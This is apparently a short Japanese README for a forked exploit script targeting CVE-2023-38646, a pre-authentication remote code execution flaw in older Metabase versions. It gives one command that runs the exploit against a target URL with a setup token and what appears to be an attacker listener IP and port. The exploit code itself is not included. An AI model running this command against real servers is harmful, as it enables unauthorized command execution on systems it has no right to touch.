
CVE-2023-38646 Metabaseにおける事前認証不要のリモートコード実行
Burp Collectorを不要にした kh4sh3iの フォーク
CVE-2023-38646 (MetabaseにおけるPre-Auth RCE):
バージョン0.46.6.1未満のMetabaseオープンソース版およびバージョン1.46.6.1未満のMetabase Enterpriseでは、攻撃者がサーバ上で任意のコマンドを実行できます(サーバの権限レベルで)。認証は不要です。
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
詳細はこちらの投稿を参照してください。